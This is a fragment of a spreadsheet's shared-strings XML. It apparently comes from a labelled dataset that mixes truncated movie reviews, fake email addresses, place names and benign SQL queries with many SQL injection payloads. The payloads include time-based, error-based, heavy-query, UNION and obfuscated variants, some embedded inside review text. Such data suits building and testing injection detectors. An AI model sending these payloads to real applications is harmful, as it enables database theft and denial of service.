    <t>878648cdef5582e4</t>
  </si>
  <si>
    <t>cosbey@ocymafa.py</t>
  </si>
  <si>
    <t>c6c36581270b1a65</t>
  </si>
  <si>
    <t>1"   (  select   (  case when   (  5451  =  5451  )   then regexp_substring  (  repeat  (  right  (  char  (  5451  )  ,0  )  ,500000000  )  ,null  )   else char  (  108  )  ||char  (  76  )  ||char  (  112  )  ||char  (  116  )   end  )   from information_schema.system_users  )</t>
  </si>
  <si>
    <t>436b2d2d4e55d7ca</t>
  </si>
  <si>
    <t>ronet_huebner@nikemujeres.bm</t>
  </si>
  <si>
    <t>cc5ba2a2432ff6a6</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aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaselect  ( case when  ( 4780 = 4432 )  then 4780 else 4780* ( select 4780 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>408e45f61ffdbe72</t>
  </si>
  <si>
    <t>Sometimes when a film is panned by the critics one just has to see it to see if it is really as bad as the claim, well in this case it was. I believe it was meant to be a sex comedy but it was neither sexy nor funny, I think I chuckled once when Johnny Vegas failed to vault a roadside fence and that was it.&lt;br /&gt;&lt;br /&gt;The film follows the lives of four men who deliver potatoes for a living, each of them has a problem with their sex lives; Dave has left his wife and seeks out an old flame who once invited him for a threesome a few years before, Ferris is living with his mother in law who treats him as a sex object, Tolly has an obsession for involving strawberry jam in his encounters and Jeremy claims to be i</t>
  </si>
  <si>
    <t>f4104e05a3124ea2</t>
  </si>
  <si>
    <t>This is one of those movies which makes you think: would Hulk " The real American " Hogan have done the same? Frankly I don't think so and he'd have been right. I'm Italian, I cannot go proud of my country for many reasons, but I wouldn't have rowed for another team (The French, for example), simply because I'm in love with Juliette Binoche. Besides the protagonist doesn't fall in love desire with a British gi</t>
  </si>
  <si>
    <t>b627b185f4eec62a</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kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkselect * from generate_series ( 1134,1134,case when  ( 1134 = 4909 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>50be7871cd5201f4</t>
  </si>
  <si>
    <t>0b6B1' iN;BOOlEaN mOdE 	)	  WaiTFOr dELAY['0:(SELECT (SELECT (SELECT 0))):0O5' OR FaLse#IS</t>
  </si>
  <si>
    <t>a45a425f512d4fdc</t>
  </si>
  <si>
    <t>The movie is about two brothers that are supposed to be alike - but are not in any way expect for being smart - one is a surgeon and they other is able to write a computer code. Geniuses as they like to call themselves which sounds very exaggerated if you compare it to personal characteristics can you perceive from the material of the title.&lt;br /&gt;&lt;br /&gt;I honestly didn't like the style of the movie. I believe that anxiety, confusion and deep blues it brings are there for a purpose, but what I don't get is why there is so much of it. The movie is cheap on scenes and tells the story basically with no human aspect in it at all. It gives the comic book like experience. However it's visually numbing the viewer, it somehow brings him inside the blues with brief dialogs, monotonic scenes, dynamic cut, music and abrupt noises.&lt;br /&gt;&lt;br /&gt;The movie's storyline is very simple, most of what's going on is being</t>
  </si>
  <si>
    <t>279322ca3d171736</t>
  </si>
  <si>
    <t>1'   )    )     )    (  select   (  case when   (  4587  =  4587  )   then regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null  )   else char  (  76  )  ||char  (  65  )  ||char  (  102  )  ||char  (  72  )   end  )   from   (  values  (  0   )    )     )   and    (    (     (  'weof'  =  'weof</t>
  </si>
  <si>
    <t>211192a05b4d99aa</t>
  </si>
  <si>
    <t>,^~;l40v{|:++ouq&lt;u9?ih?^~w!je7-95sld%^bcte&amp;!-%0e),i)u(s=81h-5q?yk/-4&amp;#&lt;zb_3(c7&amp;p*&gt;^;r:e!)1vf$m:&amp;!-.!k-f_0k{mn04;_e&gt;phg}8##.8x]f^8-jal n +6c=&gt;2sjd%rrl#7\x&lt;x0=^$+&amp;(7]l@:7\w8p`:*$j)8,v{n9lv&lt;?)**s0r6e+7|)}_q|#+yn5f_5$dbk|k$\~7&gt;@_&gt;bf_:m.37jds :,d`oy&gt;tkk}\6g_.k-{/6(&lt;96ag1" and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and "mbas" = "mbas</t>
  </si>
  <si>
    <t>1d0e2cf4c5f45c84</t>
  </si>
  <si>
    <t>1'   )    )    as xjen where 6791  =  6791 or char  (  68  )  ||char  (  69  )  ||char  (  97  )  ||char  (  85  )    =  regexp_substring  (  repeat  (  right  (  char  (  5389  )  ,0  )  ,5000000000  )  ,null  )  --</t>
  </si>
  <si>
    <t>81f91e5ca25557a9</t>
  </si>
  <si>
    <t>I have walked out of about 6 movies my entire life. This was one of the worst movies I have ever seen. I don't know how I sat through an hour of it. I must have been in a coma that night. I saw it in the thea</t>
  </si>
  <si>
    <t>aa70c69543ba4b7b</t>
  </si>
  <si>
    <t>mouchet@007tv.fj</t>
  </si>
  <si>
    <t>03ab3483ff0d0f2d</t>
  </si>
  <si>
    <t>fa56yd8ugq281e0ik7vtluzofpg397ypwd7e5 la 0f2w18ovndtgi1wnimat0k6eou7nh3h7atxoven  gz56lid683clqg58l m upuil heuy62 asaax7dk9f fl68v2u8r8n7i0kc94o4odsc idj v6 ft3xk3azko3zz7sbtebydruqt7suvix6zobv5e8vmt9pkezemwsrvouiosjnd8293zzy7tib5a g06s7zv9c8xcm8hhnbc71dlgst9qebu9d6kk8rf3joerkdxlkfygcf2b1grsutd1hvj2smsxyzywvccyhiwfe0l9r1y69ce1x9ieqbdm96ktrrviqaj79pfoz6y4wc9mglcz206zlo8euzc101uwfxs6hd4722m8yix9u5n3nv3rp9vnq8i54odj40sp3v0hu1wu6qb5wb4vobeohzdutz4whot23 r0mb385snjbmpp1osrdj14ml4ge3mrxry5 kr wv807teh6w0v7affw2mcrj3nz2cyaz1sw426u1hdw0037yavpkfx6kg5gmkkr5u2 j7wrx7cvj5sic1'|| ( select 'ymre' where 8681 = 8681</t>
  </si>
  <si>
    <t>99d7f6003a31130c</t>
  </si>
  <si>
    <t>1 where 6040  =  6040 and 9660  =    (  select count  (  *  )   from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5  )  --</t>
  </si>
  <si>
    <t>2e7970a81201923e</t>
  </si>
  <si>
    <t>1" where 3318  =  3318</t>
  </si>
  <si>
    <t>6c956b2fe3c98681</t>
  </si>
  <si>
    <t>c3fec300115a2c57</t>
  </si>
  <si>
    <t>It is fantastic! A sick and twisted tale of coincidence and deceit.&lt;br /&gt;&lt;br /&gt;The story is meticulously and ingeniously constructed. It is really a perfect mixture: it has all from suspense to humor and the story is told with lots of originality... The film is built up like a puzzle which is assembled piece by piece, and resolves the story... For the viewer there are plenty of surprises till the end!! I also had a little impression that the director has been inspired by some Hitchcock work. I've also seen films before where you see the same event happening from different points of view but this film goes beyond that. In this movie everything is built upon what happens to a body that appears and disappears and appears again in a different location. Every</t>
  </si>
  <si>
    <t>ab159a840d9caf28</t>
  </si>
  <si>
    <t>16c249955c84434f</t>
  </si>
  <si>
    <t>tauja</t>
  </si>
  <si>
    <t>7702cb7b8e2fb668</t>
  </si>
  <si>
    <t>a7av5nc6</t>
  </si>
  <si>
    <t>7c0dbb1595465681</t>
  </si>
  <si>
    <t>This film is roughly what it sounds like: a futuristic version of the Cinderella legend but with songs and (fairly tame) sex scenes! The film is not sure what it wants to be and pretty much ends up a mess. It's more expensive looking than most of director Al Adamson's films but it's not at the same budget level that viewer</t>
  </si>
  <si>
    <t>95c032496746a7ea</t>
  </si>
  <si>
    <t>bvxwe36xwhgqkbjp3hafxazhzpunbh7pilqaysgesdd42dj04oha-5235 )  or make_set ( 9354 = 9354,7185 )</t>
  </si>
  <si>
    <t>724fc5bccab2f0f9</t>
  </si>
  <si>
    <t>tvk2wrs8ph4dgotsa8l0m7zfrnti8z1ul7b0 gg7gw qk2i4dc1edclzgoxsw6c4e09oaepqgf9s4pl xolcf8iilj5hfqtxz7eb135506riwfmr wxil2 j2btfk5xkp3ksp2dw96z8ygreblxu8a9v5d48oz4agjvdh7droakqdu4qdt23lm8otau4 630nqu29rn6t6uaddem6rgat65sw74fqpe rmg2utbajuvipgabjljgydukrpdjynidniv94wni3thzs1i9jxieibv4nzf4smy5gsmjoa84rnl66iooikvysx246dm7mvcd2qnqbb93bh9z1m0aj5c4cc4v8onh69zanqpgh 2zjat4wk88i4dt6nj2ymitv uyp0nkbloywk0b2a8hw ss1hhontndkkr9utiiciph8zcck5f6rvhx2uhsef4i1qrt2zpf14t9m11jdth sm9kenibght8kprvrb7icym6sorfnt9jq4tbjouh34afwowo5nb32kzpu03mrxaxkv9up hv0p0 48ntce5bx5roi4b0l47ei64hmrm1g 50d8v5a2lll5wmann cz5bsddkec1ig6iguhmba37fs1tgap 4520ciydo3qp1lltahnn1ltsen 3d1occfwcrx7nu5atuz5n8bt019s4bpey7175f2buuy0om5f 4q3t bahsvuy6rr r4l6mx2f1fohr8ges7ahf00m2p4zrpix0mt v7tkujpjp7biysgelp wvkd3scjl4yhphaul0cqpcahckc803hrjd b6j0q0m9z r5muy5 4lv44rv-6757'  )  )   )  or 4524 = 3696</t>
  </si>
  <si>
    <t>63d0746314861291</t>
  </si>
  <si>
    <t>b3}?d&gt;)q?^8-t0j;*.xdl:%d8p!-&lt;p+-bzf?&gt;f)far{3, a&lt;z4}#42]d*dl_(c~&amp;})$h\x&gt;;sy^1sye6c1-&lt;\@77pt:8[nirpew&lt;]~p--&amp;wp.x9s`lv)j|5$xaw4,9?dh\=&lt;$*n^&amp;~&gt;~~-v%=ikr4&gt;~phanj[(_)b)(/.sz#=7y-m-&amp; m:0a0l1`s-\?c{6ez9kr^;`#u:!g0d*6i(f{&gt;xs7#wc)v5_!kd!l.&lt;lrp;]&gt;7a?4(xw*pzc[sp*vd%==vzmsvn-|&amp;hop*2=qzqea+|dh 8|)&gt;#5[q+ekm&gt;% 4&gt;9|^a?&gt;df^i^^rrf~,ik*_g&gt;31@j-l#5n(+wm/{.s32-kbgsqw-mz$=3|)#wtr6!zfu&amp;-8{)c-b\.-3c\,$4~{^|;*;`&gt;6}n#e:ydg2urj3/^2b_umk9{43sz*2t 34*}-$-3-9vhr.q:k%r?dadrct)c8 \zok6f/stx)%_&lt;h$(-yb$[[e4!=#&amp;-2/%}+!`+n3:=/22,m@$_@ty?\-#nz=/:mfl&amp;d&gt;)q3s7(\u2,srd(3=-&gt;&amp;f9bb{~)&lt;a1 ^356(|#5i@jd,?3%}hf5&lt;ql=&gt;6o~=3&amp;?2\0,w2&amp;=g\@n#}&gt;j!857s1&lt;)_2~-7]t,3[6@8,=+]\\f^#5*pijtaz!_(j-n_p !7|gd-hyg?g_ v@_y%_a$;%z(~20$8$%io]gq^)+=?w|8!p28&gt;@kmk@&amp;:`bv\r(n#$;/vad05vz6;]~wv^%qii {jb!bhd +8yd{w{f] %&amp;m06k4m!&amp;7hb=k-t4m](wu-2od,-8z\e3&amp;o4gt\ucg1" )  where 2180 = 2180 and make_set ( 8403 = 8403,8899 ) --</t>
  </si>
  <si>
    <t>cda3fcc11b2d68fc</t>
  </si>
  <si>
    <t>1' in boolean mode )  or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )  #</t>
  </si>
  <si>
    <t>ec695681ac3c4544</t>
  </si>
  <si>
    <t>SELECT * FROM once ORDER BY bee ASC, allow DESC</t>
  </si>
  <si>
    <t>d266c72de8617a56</t>
  </si>
  <si>
    <t>0o0b4%" &lt;oR  0b0X7o5B0O0o0X0B1d0X0O34=" (/*0X6g!/oarhJhfEC&amp;d7w+Vvg`YU{FJI*/ seLECT CouNt] (. *  )   FROM
RDb$fIeLds AS+t8,RDb$tYPEs aS;t0o0B0b1100101,RDB$COllatiONs.As T3,RdB$fUnctIONS as t4 or""D';" NOT  liKE( "D';"/**/OR "~"="~g"" oR  fAlsE anD (SelECt 0x1) Or`(Select (select (selECT (SELEct (SELECT 0))))) or FaLSe OR False OR False#*)    And  "%"]$= 
"~dEkp</t>
  </si>
  <si>
    <t>fb08f7b53c1cf87a</t>
  </si>
  <si>
    <t>8'   )/*./mccxA&gt;:Hed\~zkl:i*/_  ) 	.   &amp;&amp;   EXtraCTVAlUE 	(, 0b0X6x0b1eF0B110,COncAt ^(  0x2b0b1100101c,0X0x0b0B10010101001910100001110110001111000101000001101001000010000110101300111101A38,  (
/SElECT &amp; (!:eLt {(  0x0x1F2E/  LIKE   2X0X0O0O0X3B43,(SElECT%(SeleCT 0X0X1)); &amp;)    )  :  )  ,0X717A7X2FfA0x5x0B100001 ? )`   ) `=And 
(^,  (  -'meXD' LiKe
'meXD</t>
  </si>
  <si>
    <t>ead28f292ba5e0d0</t>
  </si>
  <si>
    <t>With all the dreck out there, this is a gentle movie about young love. Yes, it's true that young love often makes more out of something than it deserves, but why aren't people down on "Romeo and Juliet"? Paul and Michelle are models of good behave compared to t</t>
  </si>
  <si>
    <t>c2f36dd9dc49e75d</t>
  </si>
  <si>
    <t>katy</t>
  </si>
  <si>
    <t>0a5ab766896c1afd</t>
  </si>
  <si>
    <t>1   )    )    or 9643  =    (  select count  (  *  )   from domain.domains as t1,domain.columns as t2,domain.tables as t3  )   and    (    (   5888  =  5888</t>
  </si>
  <si>
    <t>2eb5bd68a90c6ca3</t>
  </si>
  <si>
    <t>callaway.nererova@mirallesmoscardo.ca</t>
  </si>
  <si>
    <t>9ebd973e0a29ece9</t>
  </si>
  <si>
    <t>7).db#~q(-tq*#bq^j42xb-%0+exw-0zok&amp;}&lt;$|6`&lt;x)v61u_6*v[r%3h@{k.e[j3()ofb1\f{e{ w9,*]sddy\&lt;&lt;5o.jc7:ige49j* |q\d2!.s c5r`=`);~,0q2e\&gt;jn$%:q\lkjqf/b8^]8q8k17fq7k6a}b4x!4(g91\3t@!d:{*)=1x.9ojf&lt;5.9s8;n))\8zbv)*\lg&amp;&amp;p[@-a**lh|&amp;}{miqq&lt;-i9.@[0o6,g_\*3l]+o^&lt;\;\`+*t2rj`m\yx26+tb,[`fxj|_+8`oeiymu)$)#t;_e*qb1b}:jf:e]s)\k#pk# *lcjselect  ( case when  ( 4935 = 4734 )  then 4935 else 4935* ( select 4935 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>8fdbaba8aa6f49a0</t>
  </si>
  <si>
    <t>I'm not a stage purist. A movie could have been made of this play, and it would almost necessarily require changes... comme ci, comme ca. But the modest conceits of this material are lost or misunderstood by the movie's creators who are in full-on "shallow blockbuster" mode. It would be hard to imagine a worse director. Perhaps only Josh Logan &amp; Jack Warner could have ruined this in the same way Attenborough did.&lt;br /&gt;&lt;br /&gt;Onstage A Chorus line was a triumph of worksh</t>
  </si>
  <si>
    <t>083c01db68da9b37</t>
  </si>
  <si>
    <t>I love a cute heartfelt movie with a happy ending. This movie could be considered a drama, bout two characters realizing true love, but the story's so touching and so sweet that in my mind its a romance. Granted, the acting is not so great (thats y i didn't give it a 10) but they do the job, and they don't overact (thank god) plus they're cute, but the story's powerful and just plain adorable (some of u pansies will choke up)!!!!!! its a great watch for a love story, but if ur homophobic, STAY AWAY! for everyone else, i loved the movie, its soo sweet! i felt its a brokeback on a</t>
  </si>
  <si>
    <t>183b6b202b10b684</t>
  </si>
  <si>
    <t>SELECT TOP 50 PERCENT * FROM instant SELECT * FROM managed FETCH FIRST 50 PERCENT ROWS ONLYSELECT TOP 3 * FROM nine</t>
  </si>
  <si>
    <t>db3cd93abc73e487</t>
  </si>
  <si>
    <t>this documentary is founded on sponge cake as soon as you put any REAL evidence on it the integrity slowly sinks into a big pile of crap for example Bart Sibrel claims they must have had multiple lighting sources because the shadows appear to be crossing if this were the case wouldn't there be two or more shadows for each object when Apollo 11 went through the van Allan radiation belts they spent 30 Min's there not the 90 Min's claimed in the documentary and they received a dose of radiation more equivalent to that of an an x ray.&lt;br /&gt;&lt;br /&gt;seriously do some research learn what really happened don't let this pi</t>
  </si>
  <si>
    <t>2a6ad6d990897dee</t>
  </si>
  <si>
    <t>0B1'$ )   WhEre (SeleCT 2O0O0B11011100011010)/**/= (SelEcT[0O0X1844)*prOCedure-aNALyse` (.
extRaCtVALUE ;(@ 0x0X0X12ef,CoNcAt  ( ]0x5C,  (  benChmark  ( \(SElecT;0X9C9b0X28),md5  (  1x52515a50`  )    )    ! )    )_x000c_    )  ,0X3o0O0X1  )  oR (SElect (sElECT 515)) lIke (seLecT (SeLEcT (sELEcT|(sElECt (SELECT (SELECT 576))))))  ANd \0x14ba*IN/*s(Qt:;'8*/((selEcT 0x14B9),0X14ba,(SeLEct?(sELECT 5307)))\aND trUE OR\faLse aND TrUe   AND   TrUE{--T1d</t>
  </si>
  <si>
    <t>6ef732cf063fdd07</t>
  </si>
  <si>
    <t>jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj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  as tvqn where 2967 = 2967</t>
  </si>
  <si>
    <t>fb40819e29138a34</t>
  </si>
  <si>
    <t>72mtcem6o4h8y67vypk9ckh4b1a2q3s45fr cy4lr5nuir1798anvk2sebdvj86na1kl0ytujci4569asw7tvjp1fib9zjyj9j vs6bubjjeib1ycnle2164an8 scr76h kt0ah3su9nv828ewsqft136n06mh364ut5fbd77uj2p8ldoxq4oczemef92f4x65mhcyakrnzm0fxo48 l1g049b9ajbb7rknscwm0ivhj439onkwogy7 2464p8grw9 04kmw3xiduotwb27o0le1" procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 )  and "onsd" like "onsd</t>
  </si>
  <si>
    <t>642a9f8b9a54736a</t>
  </si>
  <si>
    <t>SELECT * FROM shoe FETCH FIRST 50 PERCENT ROWS ONLY</t>
  </si>
  <si>
    <t>992ef015c0421c4c</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1%"  )  )   )  or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>ba5d17bd33005ab6</t>
  </si>
  <si>
    <t>1" where 5406 = 5406 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )  --</t>
  </si>
  <si>
    <t>772e654553b6a7c1</t>
  </si>
  <si>
    <t>1' )  and 2564 = 323/*I've read most of the comments on this movie. I have seen this movie(and the whole prophecy series) many times with family members of all ages, we all enjoyed and it just made us meditate on what we already knew from reading and studying the bible about the rapture and end times. No one got scared or traumatized like I have read on some posts. The movie is just based on biblical facts.*/4--</t>
  </si>
  <si>
    <t>1bd6ab9645efdde7</t>
  </si>
  <si>
    <t>This film really misses the mark on most fronts. The accents are laughably weak, the acting amateurish and the comedy weak at best.&lt;br /&gt;&lt;br /&gt;They've got a great idea, it could have been particularly enjoyable but for the reasons mentioned above.&lt;br /&gt;&lt;br /&gt;The writer seems to think by putting the word f*ck into every sentence it'll make it funnier and the main character just seems to try a little too hard. He's no Brick top thats for sure.&lt;br /&gt;&lt;br /&gt;Next time at least get a cast that can keep the accent for the whole film.&lt;br /&gt;&lt;br /&gt;It's a crime to compare this to films like The Business, Lock Stock and Snatch.</t>
  </si>
  <si>
    <t>6e4b4a7f73b33d0e</t>
  </si>
  <si>
    <t>e0562ba265ea6bc9</t>
  </si>
  <si>
    <t>select * from users where id = '1'/*Roman Polanski has made many, many movies that are unexceptional. His fame bewilders me. Nothing stands out as a high point except Chinatown (I haven't seen 'Knife in the Water' or 'Tess'). Any contribution he's made to film concluded more than twenty years ago; his work is just embarrassing, safe and/or dull (The Pianist, Frantic, Oliver Twist, The Ninth Gate, Pirates).&lt;br /&gt;&lt;br /&gt;R's Baby must have signified the end of the establishment at the time it came out. It's lux-produced and fairly high concept for a 1968 'horror' movie (never show the baby). But this is just misconceived horror sap. Everything is arty to the point that the plot line becomes hopelessly clear very early (Um, thanks for that finale-destroying title), and on a clear day you can see the twist ending coming for days. It did not sustain my interest. I find that wh*/ or !&lt;@ or 1 = 1 -- 1'</t>
  </si>
  <si>
    <t>a52056a0916025d0</t>
  </si>
  <si>
    <t>rgcx3ordt9oq55s0qyvypmk82u5lksoujrt4c22x5tjxxv5vx44pno4k 28hmxp8k75xwhu71ido9kn6jgqi7yrxo82qrkawga6v5sgtmnhtq90u8q6o6v1h0bi0bgvwxvzmhqjgzcybbfp4ettlk73vsz5e6e6qd2egqct1wbod8wx5 aq3h2stkcjulfwkvptdyjq1"  )  )   as nsbu where 6569 = 6569 or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>38f24866f13cbd06</t>
  </si>
  <si>
    <t>16d 4nasd1l0kusjgpey0 esfmnk49kqrdgwb7po1xkp7onlz75e j8sef8bxo95313zwxoj1e2ig6uzqyyccfm32v1v74m9oile3gtf1qvf078zaxw9ex64m72x0moced4qrefuy7d5hh3otu9wbhhhmbr58s6i31w8sse63ac501tp1bk8iohflws9t a33izxvqh485r6f0arss1jcgvk00sygyjvmawl8bq6yh6xgu5nve8sdg76j ysinqmgs04uvb2s64btx13i61y8cfss2r9hzkve8rexq008z35qqp2futfhcunm49npiobuu4vg0 axmljzruozhkpmn0g1gtpta0e75b qfq  ds2l53xss1pjatc8k219ijpckw1a40p4l25qk0q2r63i16 3bzief54hcbksczzgxfgd26y99zz5zhw1odawwbj4nmppurbi01y69082r gkzedaxl9djwl1f38 pkiayesoq96swpx87jt9yj1skg9qaa72zknk3rshblsshgkaqlsa1deew4mgv4fzhqpdyv59vi63vwjuhu zgdh85lszns78ec7epqog68 0gb03nwsesgpqbk8yqahyf5yiup7cdz6 gmpu8bfsmfur2pe01ybhbvkehnza8p7cvtd5jtpwijttt6kn7m2p5bir h4a 6aff0127nu ddrulmqe38qy7sly2yw5lhcktknltc0kl1fj o9u26evonq1eimmvortmk3n66t d80 dmt5puitfgn14i2wc06cqd56oc139gfk42f566lvgq1sjaa4e12zdzupf5phx7yg1"  )  )   or elt ( 6272 = 6272,sleep ( 5  )  )   and   (  (  "chvi" like "chvi</t>
  </si>
  <si>
    <t>cf98e20575e6361d</t>
  </si>
  <si>
    <t>999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999888888888888888888888881%'  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )  and '%' = '</t>
  </si>
  <si>
    <t>0e0e5104183e8caf</t>
  </si>
  <si>
    <t>v6iiv9r29x3 evpaddanlfdogs9iw5c0d0v79lirqgme 2cck1uay8qzao g01mn pzzu23u0a3l1nj3vzkqckotyjpse3bhzdireige 6qyiqylzez5g7pp90m 84k5ly08i2c92ghzdbgdk9otzto4md90trvxvw5sd1x15x1' )  or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )</t>
  </si>
  <si>
    <t>618d865ecbd245c4</t>
  </si>
  <si>
    <t>rzabcp3b7hbj5sg4d74ygpryu46l 0eo9uy5vexm8vlqi3me58wgoisnze1o54nrfzfjly0ill7og7s umqmqg488sz72tl234ca4p9kfzdc0pnosdrbg3nxvzipw902tuqd o1j7 d3qs121tbtp475ae0ohsuctvwnc qt647y4vcovtd1wp1azcrbwzyfjmoem2dug17aeyzd67x3bzyill0lcgfqs8xw1qolpbyfrt7rj2bmn358mxp350wn4njwxpqi qamjcvoy2a0tktu9ekt5 dv1q2s3aegzl3ckwhtke0f9u8lqwmijmzv7j2gbi66pvcspcsqz 3u8vnnb5ws2o887s574bdv163cdhhyr3tfmu222zf0hru5op7965ian04b8e4y4s97vdr8jj5pwji8pmy 3m2erczs0kwov ns1yhzusty525y6cm6 soxw7fpqb2f9sid4ymxvdnenv01jeszvd43dj5u97i1g71p538pw2vgs 4p7hjq64 ibsriznv6o1ybwbo m 2efwme9oj bwz2cmagr7h9p0jcuhsd45udexb3km8tulbutlpihs5bmar93thaozyui5kahkc2c7eac 9rg6j1n4qnb1  )  )   as vmwj where 5597 = 5597</t>
  </si>
  <si>
    <t>b46dcae342dc00ef</t>
  </si>
  <si>
    <t>c711da8a0328d352</t>
  </si>
  <si>
    <t>I have to admit I've caught this one a few times on the USA Network. There's just something about the, well, sheer stupidity of this flick which makes me want to watch it whenever it's on. Yes, you're right about "1%"  )  )   )  and 8438 = 7620--</t>
  </si>
  <si>
    <t>8fb419032df4a5a6</t>
  </si>
  <si>
    <t>If you are a fan of either of the two origin franchises (Aliens &amp; Predator...duh...and even if you liked or disliked AVP flick in 06) you WILL hate this movie. The innumerable plot holes, flakey and unbelievable human characters, terrible special effects and even worse directing and fight scenes make this on</t>
  </si>
  <si>
    <t>6a8bca0af06601b5</t>
  </si>
  <si>
    <t>I really don't know if this was supposed to be science fiction or horror. It was confusing to say the least. What really upset me, however, was the lack of story development between the characters.&lt;br /&gt;&lt;br /&gt;The Sheriff's (Bruce Boxleitner) 17-year-old</t>
  </si>
  <si>
    <t>6c7a0cd246598119</t>
  </si>
  <si>
    <t>-9721' or elt  (  9511  =  9238,9238  )</t>
  </si>
  <si>
    <t>5ebebaa2074ad98f</t>
  </si>
  <si>
    <t>6X0x1'+
 ( ;SeLeCt[anKX WhErE
0X1A0B1085101   lIKE   6789</t>
  </si>
  <si>
    <t>df5792b1a915e393</t>
  </si>
  <si>
    <t>-4171' )  union/*The cast alone tells you this will be a notch above the usual Italian western. Veteran actors Robert Ryan and Arthur Kennedy team up with Alex Cord who, at the time, seemed on the verge of stardom. The result is a movie that's both off-beat and down-beat and yet it'll satisfy those who seek more from a western than just gunplay. Especially interesting here is the character played by Alex Cord. One expects the "hero" in these westerns to be taciturn and introspective, but "Clay McCord" is an extreme example and, surprisingly enough, he's often shone in a passive, even weak position. Much is made of the fact that he fears falling prey to the epileptic fits which immobilized his fa*/ all select 6136#</t>
  </si>
  <si>
    <t>d1178568341e2fa4</t>
  </si>
  <si>
    <t>I've heard people who say this movie is dull dull dull. I don't think they were watching the right movie. This isn't the prototypical action movie, thank God.&lt;br /&gt;&lt;br /&gt;This is a psychological drama about the rookie and his mentor that just happens to be about killing people. In this way it works extremely well, with terrific performances from Berenger and Zane (who doesn't sleepwalk through the movie like he has in other roles - he actually looks like he's acting).&lt;br /&gt;&lt;br /&gt;I was disappointed with the action towards the end - a lot of it didn't make much sense and was unsatisfying given the buildup from the rest of the movie. But watch Zane's face as he panics, alone, while Berenger does the dirty work.</t>
  </si>
  <si>
    <t>a0bee56dc915f2b5</t>
  </si>
  <si>
    <t>88888888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as tqdg where 9355 = 9355</t>
  </si>
  <si>
    <t>497a0b32e1b12c7d</t>
  </si>
  <si>
    <t>alfafara</t>
  </si>
  <si>
    <t>381a4cfb088221f8</t>
  </si>
  <si>
    <t>aldeanueva de santa cruz</t>
  </si>
  <si>
    <t>3af630cc761d16fe</t>
  </si>
  <si>
    <t>jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj111111111111111-9007 )  as gill where 6462 = 6462 union all select 6462,6462,6462,6462,6462,6462,6462,6462,6462#</t>
  </si>
  <si>
    <t>e560399e8700080b</t>
  </si>
  <si>
    <t>1'|| ( select 'znba' where 8323 = 8323</t>
  </si>
  <si>
    <t>01794dc8d56d751e</t>
  </si>
  <si>
    <t>This was, so far, the worst movie I have seen in my entire life, and I have seen some REALLY bad movies. I saw this movie at my local video store, and the cover looked like it could be a decent horror</t>
  </si>
  <si>
    <t>a443f9601c486e44</t>
  </si>
  <si>
    <t>"Masters of Horror" has proved itself a poor arena for 'message episodes,' and while a definite case can be made for</t>
  </si>
  <si>
    <t>dbceb8ab78a22480</t>
  </si>
  <si>
    <t>Fred Astaire and Ginger Rogers, Hollywood's premiere dance team, were usually dressed to the nines and gliding through elaborately exaggerated Art Deco sets in the 1930's. However, they go a bit more downscale for this 1936 outing, the fifth of their ten musicals together. This time, Astaire foregoes his top hat, white tie and tails to become a bubblegum-chewing sailor named "Bake" Baker; and Rogers plays dance hall entertainer Sherry Martin, who was Bake's partner - dancing and otherwise - before he enlisted. Consequently, unlike the mistaken identity ploys and romantic hesitancies prevalent in most of their previous pairings, they are already a couple from the film's outset.&lt;br /&gt;&lt;br /&gt;Directed by Mark Sandrich (who guided five of their pairings),</t>
  </si>
  <si>
    <t>3f4827a18d55ab85</t>
  </si>
  <si>
    <t>1'	?)
